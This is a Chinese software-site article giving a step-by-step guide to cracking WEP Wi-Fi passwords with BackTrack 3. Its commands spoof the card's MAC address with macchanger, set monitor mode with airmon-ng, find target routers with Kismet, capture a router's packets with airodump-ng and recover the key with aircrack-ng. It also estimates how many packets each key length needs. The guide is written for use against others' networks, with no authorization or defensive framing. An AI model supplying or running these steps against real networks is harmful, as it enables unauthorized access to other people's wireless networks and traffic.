您的位置: 飞扬精品软件园 >> 文章中心 >> 硬件天地 >> 无线天地 >> 应用BT3破解wep密码步骤简要说明

相关文章链接

最新新闻资讯

    应用BT3破解wep密码步骤简要说明

    应用BT3破解wep密码步骤简要说明


    • 阅览次数: 文章来源: 原文作者: 整理日期: 2010-05-23

    1:无线网卡MAC地址伪装
    2:修改网卡模式为监听,启用并激活无线网卡。
    3:获取无线路由的相关信息(MAC、SSID、Channel),可以通过Kismet,亦可用其他方式获取。
    4:监听指定路由器,抓包
    5:获取到足够多的数据包后(通常Wep的),进行破解。

    由于对于原理不清楚,以下仅是傻瓜式的操作说明。

    1:查询无线网卡的设备名(可能是eth,wlan,wifi,ath),总之在未启用的状态下修改它们。

    首先用ifconfig -a查看一下无线网卡设备名,修改如下:
    macchanger -m 00:11:22:33:44:55 wlan0

    如果已经激活,请先down掉,再修改。
    ifconfig wlan0 down

    判断是否激活就是用ifconfig来查看,是否出现在列表。
    未激活状态的设备wlan0,是不出现在ifconfig的显示里面。
    但是可以出现在ifconfig -a菜单里面。


    2:修改网卡监听模式,并启用。

    如下命令:
    iwconfig wlan0 mode monitor 或者用 airmon-ng start wlan0

    修改模式后,用iwconfig检查mode是否改变。
    iwconfig wlan0

    经上述修改后,启用网卡
    ifconfig wlan0 up

    3:监听无线路由的相关信息MAC、SSID、Channel


    三种方法:
    A:Win下获取
    B:iwlist wlan0 scanning
    C:kismet

    (提示:bssid其实就是无线路由的MAC地址。)

    这里简要介绍一下Kismet的监听,使用。
    使用Kismet命令,需要修改配置文件/usr/local/etc/kismet.conf
    source=none,none,none

    例如T61,用的4965的无线网卡。
    source=iwl4965,wlan0,1
    例如TP-link的atheros的无线网卡
    source=ath5k,ath1,1

    从上面可以看出一些端倪,
    source=1,2,3
    字段1:请参考http://www.kismetwireless.net/documentation.shtml
    字段2:设备名
    字段3:我不知道是什么,总之写1都没有出过错。

    字段1我曾经以为就是无线网卡模块的名字,后来发现不是完全匹配的。不过至少可以尝试lsmod看看。然后去那个URL那里找。

    4:上述准备充分后,就可以进行抓包的动作了。

    用下面命令抓包
    airodump-ng -w outfile --channel 11 --bssid 00:12:34:56:78:90 wlan0
    上面的命令很容易理解,监听11频道,MAC地址为00:12:34:56:78:90的无线路由器。
    -w outfile 是产生前缀为outfile的2个文件。当你第一次执行这个命令时,产生下面的2个文件
    outfile-01.cap 和 outfile-01.*(忘记这个文件的扩展名了)

    通常:
    64-bit WEP “暴破”需要3W个包
    128-bit WEP “暴破”需要10W个包

    5:破解

    aircrack-ng -x -f 2 outfile-01.cap
    aircrack-ng -w dict.txt   outfile-01.cap


    .abu.点评:
    BT3就是Back Track 3,是一张live CD linux,可以做成自启动的光盘版、U盘版以及VM虚拟机版本,上面集成了几乎全套黑客工具。由于内置强大的破解无线网络密码的系列工具,所以常被用来做破解无线用。

    近期我还会发一些文章资料上来。


查看所有评论

网友对应用BT3破解wep密码步骤简要说明的评论

网名:
主题:
内容:
验证码: